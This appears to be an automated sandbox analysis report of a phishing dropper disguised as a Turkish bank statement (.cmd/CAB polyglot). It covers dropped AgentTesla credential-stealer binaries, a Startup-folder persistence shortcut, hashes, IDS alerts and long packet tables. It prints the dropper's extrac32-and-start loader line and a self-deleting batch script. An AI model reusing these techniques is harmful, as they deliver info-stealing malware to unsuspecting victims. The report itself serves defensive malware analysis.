Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5is4myz.isu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.989991939967194
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRILKfBQty:hWKdbuoL923fJWAawDNe923fTh
MD5:	CECC1C22C5DD7697F240A4DDC63994D4
SHA1:	C34D230A037B7B427FABE8A0F7DA76A88BEEDECF
SHA-256:	4B9DE5489A0CB246C0A7E8C0DC932A989732B68E26F66055B1C82B7487B07819
SHA-512:	E1A6143DB3BBB55088D704FF49ED5E94C25A04CDA72233F1270F9663B937C5734CFBE7092EC4B2E8DC8B59230011C1B2D1084C0A9F8B2593F6E793271A6C3382
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD0BF.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1081856
Entropy (8bit):	6.9272903664814445
Encrypted:	false
SSDEEP:	24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
MD5:	31BC6907D6097A76BB1DD891CFC09B7A
SHA1:	97340CA203A1207E492135D580C6860A724A227F
SHA-256:	F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
SHA-512:	6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 12 13:28:18 2024, mtime=Tue Nov 12 13:28:18 2024, atime=Tue Nov 12 13:28:15 2024, length=231936, window=
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.4937986884798073
Encrypted:	false
SSDEEP:	24:8w7rHfm84Z7tO5UA1s4FSnplwO4ZTqlgxm:8QrHTAtO9G4+plwZTqlo
MD5:	EF2F0B75F9EB315C97BB8D84174E89D4
SHA1:	A63E357844EBF0B7463F54CEAFC076ADD7611056
SHA-256:	1C77BDC34C3AF4A0805728233CCA51A5770D9F4E0CD080CD0CF03B6DC97EF2FF
SHA-512:	84F68578B574D259B3E6FAEAFD73A0F7CF67D870260970896EE8A675F575BEACFC67E4447332BA17E58C640FE3C0647D10DE74E898C3E90C936DDA4945BE17F5
Malicious:	false
Preview:	L..................F.@.. ....G...5...o...5..7.t..5............................:..DG..Yr?.D..U..k0.&...&...... M..........5.......5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.s....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.s..Roaming.@......DWSllY.s....C.......................x.R.o.a.m.i.n.g.....T.1.....lY.s..ACCApi..>......lY.slY.s..............................A.C.C.A.p.i.....l.2.....lY.s .TROJAN~1.EXE..P......lY.slY.s....E......................@.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........,........C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

C:\Users\user\AppData\Roaming\e5c7a92cab22d576.bin

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.985982422659667
Encrypted:	false
SSDEEP:	192:v8hdcG5whIfxIpV0s5TKbpd6koBNUDMGZvy7tMF8gms+TjK3e8Zz/mkW0YngB29:k6CJp+TopaBNUwEq5MOgUjAzekengw
MD5:	2E93D1F30644FC2BC4EFAC469215796D
SHA1:	89522CCB8D27FF6C064D13569764D8BA7579A28B
SHA-256:	A6F69B99BECB49EFD80018C22E391DCDD6317F3A7EF52C625A1BC24D05A3BBE7
SHA-512:	E5BBF8239BA78EBF81C7269339A22841BB982E39548536EDC77825E1D055B74330F835011E0B94E5A50FD58023D86FE71A5BDD12DFF024EF306040CDCED82119
Malicious:	false
Preview:	...Po:..%'a....^...........Fh...CSb....(z.WN....{&.1%;.Om..%...L[>z\.i.x.%.\|............A2..U.'9...z..9.....!_....\|.K.c..9`.L...fH.=u.......J6Rk.Vj.m....-....{v3d..s8...Z.;....r.Y.@..y..a.........\|H.q.....d=.........O.\|....!....T..b....?......Ge.4M....a.,....n5..Z.x ..s\|..a..I.mQ.......@.Z.....Kr9p.....k!.!.bp...KD.].4.0e......cl.. N.&.~.A..rt6.vR.\.(.....-.U.}3_.5.j.Z..q.%\0$._QX..>..$7-....o-.....o-.=J4.,.d...b.,9].L[.u...O.2.+.E[..aYC.9MT.....c.Y.0x.W.I......_.Xzw0..B......8..9C..3.c..../.(.....x...o......5 .......L..=0......H.....v..,\|.CI.f..9N..W...n.....r.<..kE.:.{z...O.{<;...,N....pP.i.7..OOa01...9W.....?gj?l.....^....h22.."p..!...{Gd..-.'"....>D.+....L.H..g.x..a.:....[..m;..9......_I%%G.../..C...K..u..."....E8S.,;.A.....9.w...{.1..:.Z.0.z...Or.........0x.>.D.q.......;p..V...p..4.).8 ...a...-.w.......A.i......q-z.d A%.Qj....v.rx4..K.#e..NA".B.F..${.3..0.hs..f!aV.i...tZ4}=.2....b..P.[._J......\|.Ah.\....C.....S.U.(..fME.a..+...G.q.\=}.

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.621315688583255
Encrypted:	false
SSDEEP:	12:qx/xTzP1eSbZ7u0wxDDDDDDDDjCaY5xcVaYAaMaTB8NGNY:+/xTzdp7u0wQakxKaLat8N/
MD5:	9EE9D5D006B87F5E5531CFF86C90D69A
SHA1:	90A4E395AB49DB4CD5829546CAFBAF688AB57411
SHA-256:	163EA04EB35ED1B8FCC1C2BC7BB8EBA73F99D268EE47F9E5AE5B00C8AA9D73B3
SHA-512:	21194776CF3E60B0A5EE7A13E2EE64EF2480EB2DF24A94F94AB068E652FCE49FC88B30940F5BE85721305233755AF6BD627722079EB0EE18DF88486574D1CE13
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x108200 (1081856) (1 MB)....Total bytes written = 0x109000 (1085440) (1 MB).......Operation completed successfully in 0.125 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 34 datablocks, 0 compression
Entropy (8bit):	6.9269519267354
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
File size:	1'082'267 bytes
MD5:	c3fd77ee6020a412a9ce44fe17c703dd
SHA1:	9ce6674753ea01856b334a26068cb6df9cb07d0f
SHA256:	19b0d0d3e3946758994d9260a1e11b794ab964ef0c8b5aa9c43a3dae7c2be495
SHA512:	3fd24428d10098fb83dfb1c90f04a908530b7ff09578034739a81c0db3a091d9ac0c9403d329696f1c509a543bdd88dded3769fe310262dfbd4de82c7f1baa55
SSDEEP:	24576:v9SO4uaLaLTcMeYyn6ZNl16gKTEUJoQ6L7zk:FKt6Y7KL
TLSH:	8535AF7AF6744861E037A5398CCB67A6582DBF7C1928B4C226F65B7C2E3A350340BD53
File Content Preview:	MSCF............u.......................".......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T15:28:10.530955+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	198.252.105.91	443	TCP
2024-11-12T15:28:27.297167+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49708	TCP
2024-11-12T15:28:58.958739+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	50629	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 12, 2024 15:28:09.735985041 CET	49704	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.736032963 CET	443	49704	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:09.736107111 CET	49704	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.783866882 CET	49704	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.783936024 CET	443	49704	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:09.783991098 CET	49704	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.922028065 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.922100067 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:09.922164917 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.924387932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:09.924407005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.530869007 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.530955076 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.572737932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.572757959 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.573033094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.626131058 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.628914118 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.675333977 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.753108978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.803350925 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.803391933 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.850123882 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.868890047 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.868910074 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.868952990 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.868971109 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.868988991 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.868998051 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.869020939 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.869035006 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.869056940 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.870721102 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.870728970 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.870768070 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.870778084 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.870806932 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.870831013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.870855093 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.914120913 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.984571934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.984599113 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.984646082 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.984674931 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.984684944 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.984716892 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.984736919 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.984752893 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.985543013 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.985565901 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.985604048 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.985618114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.985650063 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.985666990 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.987262011 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.987282038 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.987339020 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.987353086 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.987394094 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.989118099 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.989136934 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.989181042 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.989192963 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:10.989214897 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:10.989233017 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.100461006 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.100502968 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.100605011 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.100646019 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.100684881 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.101207972 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.101227045 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.101283073 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.101298094 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.101320982 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.101341009 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.102029085 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102051020 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102128029 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.102142096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102180004 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.102523088 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102544069 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102603912 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.102613926 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.102639914 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.102657080 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.112319946 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.112350941 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.112410069 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.112441063 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.112469912 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.112488985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.115930080 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.115955114 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.116034985 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.116055012 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.116107941 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.116137028 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.116152048 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.116184950 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.116189957 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.116242886 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.116257906 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.229635000 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229661942 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229733944 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.229758978 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229784966 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.229801893 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.229829073 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229846954 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229926109 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.229931116 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.229968071 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.230127096 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.230144024 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.230170965 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.230175018 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.230212927 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.231046915 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231067896 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231132030 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.231137991 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231182098 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.231553078 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231570005 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231620073 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.231625080 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.231661081 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.232316017 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232336044 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232398033 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.232404947 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232450962 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.232530117 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232546091 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232594013 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.232599020 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.232641935 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.233356953 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.233376026 CET	443	49705	198.252.105.91	192.168.2.5
Nov 12, 2024 15:28:11.233433008 CET	49705	443	192.168.2.5	198.252.105.91
Nov 12, 2024 15:28:11.233438015 CET	443	49705	198.252.105.91	192.168.2.5
